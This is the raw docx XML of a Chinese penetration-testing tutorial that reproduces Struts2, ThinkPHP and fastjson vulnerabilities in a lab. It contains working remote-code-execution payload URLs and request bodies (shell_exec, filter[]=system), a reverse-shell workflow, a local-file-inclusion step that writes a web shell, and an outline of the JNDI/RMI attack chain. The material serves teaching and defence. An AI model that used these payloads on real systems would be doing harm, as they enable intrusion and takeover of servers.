          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>看响应结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02721BDE" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:ind w:firstLineChars="100" w:firstLine="24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工具的方式：直接用别人写好的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>来进行漏洞检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA3B3A4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④S2-045漏洞修复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F89E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1、修复方式：升级Apache Struts版本至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.32 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.5.10.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">以上。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB108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2、修复建议：在网络防护设备上配置过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4502AD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4.3S2-048漏洞攻击还原</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E846A3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1、在windows上的终端窗口运行Struts048漏洞exp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EB586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2、输入指令指令：python2 Struts048.py 跟URL地址 "指令"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AB6FDC" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:before="100" w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0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1" w:name="_Toc20783"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>五、ThinkPHP框架漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="06EF424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ThinkPHP版本很多，主要是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ThinkPHP5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ThinkPHP6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CEABA2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5.1 ThinkPHP网站特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9B39C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查看HTML源码，可能会发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{$}, {:}, {foreach}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>等ThinkPHP特有的模板语法标签。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4004253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页面发生错误时显示默认的错误信息页面，通常包含ThinkPHP的logo和错误信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A138E7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后端控制器操作中会看到类似{controller}/{action}的命名规则。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E020A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5AB10F20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559E2221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lastRenderedPageBreak/>
        <w:t>5.2 ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E902E38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①漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C49F933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ThinkPHP 5版本里的那个处理控制器名没有配置正确，所以在网站没有开启强制路由的情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEA181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下(即默认情况下)可以执行任意方法，从而导致远程命令执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAAAF86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②漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C960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访问站点默认启动页面，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即可看到ThinkPHP默认启动页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B539A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直接将URL添加到如下Payload里访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870A536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执行phpinfo：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547EECA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00" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId107" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>http://192.168.1.9:8080/index.php?s=/Index/\think\app/invokefunction&amp;function=</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2449629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00" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>call_user_func_array&amp;vars[0]=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>phpinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&amp;vars[1][]=-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E57FCDE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执行任意代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008CAB7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00" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.135.132:8080/index.php?s=/Index/\think\app/invokefunction&amp;function=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9AAD6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00" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>call_user_func_array&amp;vars[0]=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&amp;vars[1][]=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFB1299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5.3 ThinkPHP5 5.0.23 远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A05562E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①漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C7F5B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ThinkPHP5.0.23 以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172AEAA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调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64794C87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②漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C79CFE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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>抓包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0829AA3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改包添加请求体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4174870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_method=__construct&amp;filter[]=system&amp;method=get&amp;server[REQUEST_METHOD]=指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6DF3F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使用火狐hackbar插件利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B34EFF8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0EDF0E06" wp14:editId="1E29BB59">
            <wp:extent cx="6478905" cy="2037080"/>
            <wp:effectExtent l="0" t="0" r="13335" b="5080"/>
            <wp:docPr id="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6E17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或者bp抓包——改post请求包（数据包样式在漏洞说明里有）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C65AE4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在数据包请求体改为想要的指令——发送数据包即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DB141C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③反弹shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F52DC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服务端写个反弹shell文件sl.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A8FD8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4204FD87" wp14:editId="547F06B9">
            <wp:extent cx="3757930" cy="956310"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3810"/>
            <wp:docPr id="8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D4E14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lastRenderedPageBreak/>
        <w:t>开启监听</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41990B5D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请求体指令部分访问此文件并执行文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2755CE2C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2831C984" wp14:editId="190C8C6C">
            <wp:extent cx="5608320" cy="434340"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="8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7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32A3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监听主机接受反弹shell成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D07CE69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5.4 ThinkPHP6.0.13 多语言本地文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8655BA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①原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F93BAA2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ThinkPHP 6.0.13版本以前开启多语言特性时，可以用lang参数来包含任意PHP文件。不过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B884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只能包含本地PHP文件，如果还开启register_argc_argv且安装了pcel/pear的环境下，可以包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05580B2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含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/usr/local/lib/php/pearcmd.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>并写入任意文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB168BC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②漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0BAE4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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>抓包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2A3D5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首先多语言功能默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>禁用，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>尝试包含 public/index.php 来确定是否存在漏洞：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088071D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hyperlink r:id="rId111" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>192.168.1.9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>:8080/?lang=../../../../../public/index</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="429B741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如果漏洞存在，服务器会报错，返回一个500的页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C2227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抓包——改包：在URL位置添加lang参数——可以看到存在漏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B06C2C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1173B8F2" wp14:editId="1F8AC7C0">
            <wp:extent cx="5970905" cy="1765300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1458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" name="图片 139"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:srcRect b="21954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9806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使用下面数据包写入shell或者其他指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FECEF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如果服务器返回pearcmd的命令行执行结果，说明漏洞利用成功：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A56705C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2A1DCE31" wp14:editId="547C058A">
            <wp:extent cx="5970905" cy="1250950"/>
            <wp:effectExtent l="0" t="0" r="3175" b="13970"/>
            <wp:docPr id="1459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" name="图片 140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4DB7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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="34ED73DF" wp14:editId="14830BB4">
            <wp:extent cx="5968365" cy="2173605"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:docPr id="1460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图片 141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F4C95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此时访问http://192.168.1.9:8080/shell.php即可发现已经成功写入文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119C793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0264BC21" wp14:editId="6D91F941">
            <wp:extent cx="5975985" cy="2160270"/>
            <wp:effectExtent l="0" t="0" r="13335" b="3810"/>
            <wp:docPr id="1461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" name="图片 142"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115"/>
                    <a:srcRect b="6621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A04E7" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:outlineLvl w:val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六、fastjson反序列化漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6AFC18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6.1 fastjson框架特征？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F55E708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如果应用仅接受GET请求且没有请求体，可以尝试构造一个错误的包含特定的fastjson特征</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8CEE3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字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>POST请求，如错误的JSON格式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129C1C7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观察响应包是否包含fastjson这个字符串，以此来判断服务器是否使用了fastjson库，并且</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FD8CB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可能存在反序列化漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C8094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 xml:space="preserve">6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="default"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>fastjson 1.2.24反序列化任意命令执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAD92C4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介绍：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E463B7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Fastjson由阿里巴巴研发，是一款用Java语言编写的高性能JSON处理库，主要用于实现Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D2165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对象与JSON字符串之间的转换。该库未采用Java原生的序列化机制，而是独立设计了一套序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B087B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方法。通过JSON.toJSONString和JSON.parseObject/JSON.parse 等接口，Fastjson提供了序列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F53251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化和反序列化的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C3ABC4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原理简介：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A15D11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fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7C070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的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A25832F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原理详解：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C268967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因为fastjson为了知道提交过来的数据是什么详细类型，加了autotype机制，每次都需要读</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71FA6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取一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>叫做@type的属性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。为了使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>能够</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>反序列化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>有一个无参的默认构造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A00DE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方法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>或者注解指定构造方法并添加相应参数。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Feature.SupportNonPublicField</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这个特</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F42DBA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性，才可以允许反序列化处理私有属性。@type注解允许指定反序列化器来调用任意类的set、get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F20D2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或is方法。这种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>反序列化的特性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可能被利用构造恶意利用链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>且攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可以通过目标类的set方</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEF8FD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法自由的设置类的属性值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336F3DC5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攻击者会利用反序列化特性，准备RMI和Web服务。将RMI服务的绝对路径注入到lookup方</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA18DA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法中，使受害系统的JNDI接口指向攻击者控制的RMI服务器。JNDI接口会从攻击者控制的Web服</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C4066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务器远程加载恶意代码，并通过执行构造函数来实施远程代码执行RCE。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003662E1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JNDI(Java命名和目录接口)是一组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在Java应用中访问命名目录服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的API，用于在Java应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C13D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程序中访问命名和目录服务。它允许将名称与对象关联起来，以便能通过名称来访问这些对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5011676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JNDI能够支持多种命名/目录服务，包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9F71F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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>RMI(Java远程方法调用)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674A4C62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允许一个Java虚拟机中的对象调用另一个Java虚拟机中对象的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28612990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color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
